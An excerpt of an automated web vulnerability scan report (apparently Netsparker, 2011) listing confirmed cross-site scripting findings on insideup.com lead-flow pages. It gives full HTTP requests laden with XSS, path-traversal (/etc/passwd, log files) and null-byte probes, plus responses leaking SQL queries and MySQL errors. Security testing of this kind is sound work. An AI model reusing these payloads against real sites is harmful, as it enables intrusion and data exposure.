select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/?'"--></style></script><script>netsparker(0x0005B0)</script>' OR prj.project_page_url = 'leadflow/meac00/?'"--></style></script><script>netsparker(0x0005B0)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/?'"--></style></script><script>netsparker(0x0005B0)</script>' OR prj.project_page_url = 'leadflow/meac00/?'"--></style></script><script>netsparker(0x0005B0)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/?'"--></style></script><script>netsparker(0x0005B0)</script>' OR prj.project_page_url = 'leadflow/meac00/?'"--></style></script><script>netsparker(0x0005B0)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/?'"--></style></script><script>netsparker(0x0005B0)</script>' OR prj.project_page_url = 'leadflow/meac00/?'"--></style></script><script>netsparker(0x0005B0)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/?'"--></style></script><script>netsparker(0x0005B0)</script>' OR prj.project_page_url = 'leadflow/meac00/?'"--></style></script><script>netsparker(0x0005B0)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005B0)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/lgds00/project.php

/ppc/leadflow/lgds00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/lgds00/project.php?catId='%22--%3E%3C/style%3E%3C/script%3E%3Cs..

Parameters

Parameter Type Value
catId GET '"--></style></script><script>alert(0x0005AE)</script>
iusrc GET iupsc

Request

GET /ppc/leadflow/lgds00/project.php?catId='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005AE)%3C/script%3E&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:23:35 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=rpigqnsqid2gphqmquejdffth6; path=/
Content-Length: 3253
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId='"--></style></script><script>netsparker(0x0005AE)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId='"--></style></script><script>netsparker(0x0005AE)</script>&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId='"--></style></script><script>netsparker(0x0005AE)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId='"--></style></script><script>netsparker(0x0005AE)</script>&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId='"--></style></script><script>netsparker(0x0005AE)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId='"--></style></script><script>netsparker(0x0005AE)</script>&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId='"--></style></script><script>netsparker(0x0005AE)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId='"--></style></script><script>netsparker(0x0005AE)</script>&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId='"--></style></script><script>netsparker(0x0005AE)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId='"--></style></script><script>netsparker(0x0005AE)</script>&iusrc=iupsc/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005AE)</script>&iusrc=iupsc/' union sel' at line 5
- /ppc/leadflow/phsy00/project.php

/ppc/leadflow/phsy00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/phsy00/project.php?catId='%22--%3E%3C/style%3E%3C/script%3E%3Cs..

Parameters

Parameter Type Value
catId GET '"--></style></script><script>alert(0x0005B1)</script>
iusrc GET iupsc

Request

GET /ppc/leadflow/phsy00/project.php?catId='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005B1)%3C/script%3E&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:23:36 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=36vcqcpo5r7s1u9ub39ne2pqa2; path=/
Content-Length: 3253
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId='"--></style></script><script>netsparker(0x0005B1)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId='"--></style></script><script>netsparker(0x0005B1)</script>&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId='"--></style></script><script>netsparker(0x0005B1)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId='"--></style></script><script>netsparker(0x0005B1)</script>&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId='"--></style></script><script>netsparker(0x0005B1)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId='"--></style></script><script>netsparker(0x0005B1)</script>&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId='"--></style></script><script>netsparker(0x0005B1)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId='"--></style></script><script>netsparker(0x0005B1)</script>&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId='"--></style></script><script>netsparker(0x0005B1)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId='"--></style></script><script>netsparker(0x0005B1)</script>&iusrc=iupsc/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005B1)</script>&iusrc=iupsc/' union sel' at line 5
- /ppc/leadflow/lgds00/project.php

/ppc/leadflow/lgds00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/lgds00/project.php?catId=80005&iusrc='%22--%3E%3C/style%3E%3C/s..

Parameters

Parameter Type Value
catId GET 80005
iusrc GET '"--></style></script><script>alert(0x0005B2)</script>

Request

GET /ppc/leadflow/lgds00/project.php?catId=80005&iusrc='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005B2)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 